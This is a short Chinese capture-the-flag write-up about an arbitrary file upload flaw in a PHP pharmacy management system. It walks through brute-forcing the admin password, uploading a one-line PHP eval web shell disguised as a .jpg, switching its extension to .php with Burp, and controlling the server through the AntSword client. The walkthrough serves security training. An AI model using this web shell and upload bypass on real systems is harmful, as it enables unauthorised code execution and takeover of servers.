​

 靶标介绍：

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

访问目标网站打开登录界面

因为没有给我们账号密码，需要进行信息收集，通过在浏览器中搜索，可以找到一篇国家信息安全漏洞库的文章

之后可以找到一个账号密码，尝试登陆发现密码不对，查看源码发现密码只允许使用小写字母，对密码进行爆破后最终发现密码为mayurik

登陆后找到一处上传图片的地方

 编写php程序

<?php
@eval($_POST['a']);
?>

保存后将后缀名改为jpg，通过网站进行上传，同时使用burp抓包，将文件后缀名改为php

完成后右键图片复制图片链接

打开中国蚁剑进行连接

在虚拟终端中执行cat flag命令即可得到flag